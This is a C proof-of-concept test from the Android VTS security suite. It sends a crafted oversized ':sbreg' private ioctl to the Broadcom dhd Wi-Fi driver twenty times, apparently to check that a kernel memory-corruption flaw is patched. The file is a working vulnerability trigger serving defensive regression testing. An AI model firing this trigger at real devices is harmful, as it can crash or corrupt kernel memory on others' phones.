1 /*
2  * Copyright (C) 2016 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 #include "poc_test.h"
18 
19 #include <dlfcn.h>
20 #include <errno.h>
21 #include <fcntl.h>
22 #include <net/if.h>
23 #include <sys/socket.h>
24 #include <linux/fb.h>
25 #include <linux/wireless.h>
26 #include <signal.h>
27 #include <stdint.h>
28 #include <stdio.h>
29 #include <stdlib.h>
30 #include <sys/ioctl.h>
31 #include <sys/mman.h>
32 #include <sys/prctl.h>
33 #include <sys/ptrace.h>
34 #include <sys/stat.h>
35 #include <sys/syscall.h>
36 #include <sys/types.h>
37 #include <sys/wait.h>
38 #include <unistd.h>
39 
40 #define BUF_LEN 8192
41 #define IOC_BUF_LEN 63
42 #define TEST_CNT 20
43 
44 typedef struct _android_wifi_priv_cmd {
45   char *buf;
46   int used_len;
47   int total_len;
48 } android_wifi_priv_cmd;
49 
50 typedef struct sdreg {
51   int func;
52   int offset;
53   int value;
54 } sdreg_t;
55 
56 typedef struct dhd_ioctl {
57   uint cmd;          /* common ioctl definition */
58   void *buf;         /* pointer to user buffer */
59   uint len;          /* length of user buffer */
60   unsigned char set; /* get or set request (optional) */
61   uint used;         /* bytes read or written (optional) */
62   uint needed;       /* bytes needed (optional) */
63   uint driver;       /* to identify target driver */
64 } dhd_ioctl_t;
65 
poc(const char * ifname)66 int poc(const char *ifname) {
67   int fd, i, res;
68   dhd_ioctl_t ioc;
69   struct ifreq arg;
70   struct iwreq data;
71   struct sdreg *s;
72   android_wifi_priv_cmd priv_cmd;
73   char buf[BUF_LEN];
74   char iocbuf[IOC_BUF_LEN];
75 
76   fd = socket(AF_INET, SOCK_STREAM, 0);
77   if (fd < 0) {
78     printf("open socket error : fd:0x%x  %s \n", fd, strerror(errno));
79     return POC_TEST_FAIL;
80   }
81   memcpy(arg.ifr_ifrn.ifrn_name, ifname, strlen(ifname));
82 
83   memset(iocbuf, 0x41, IOC_BUF_LEN);
84   memcpy(iocbuf, ":sbreg\0", 7);
85 
86   s = (struct sdreg *)&(iocbuf[7]);
87   s->func = 1;
88   ioc.len = IOC_BUF_LEN;
89   ioc.buf = iocbuf;
90   ioc.driver = 0x00444944;
91   ioc.cmd = 0x2;
92 
93   arg.ifr_data = &ioc;
94 
95   for (i = 0; i < 1; i++) {
96     if ((res = ioctl(fd, 0x89F0, (struct ifreq *)&arg)) < 0) {
97       printf("ioctl error res:0x%x, %s \r\n", res, strerror(errno));
98     }
99     sleep(1);
100   }
101   close(fd);
102   return POC_TEST_PASS;
103 }
104 
main(int argc,char ** argv)105 int main(int argc, char **argv) {
106   VtsHostInput host_input = ParseVtsHostFlags(argc, argv);
107   const char *ifname = host_input.params["ifname"].c_str();
108   if (strlen(ifname) == 0) {
109     fprintf(stderr, "ifname parameter is empty.\n");
110     return POC_TEST_FAIL;
111   }
112 
113   int i, ret;
114 
115   for (i = 0; i < TEST_CNT; i++) {
116     if ((ret = poc(ifname)) != POC_TEST_PASS) break;
117   }
118 
119   return ret;
120 }
121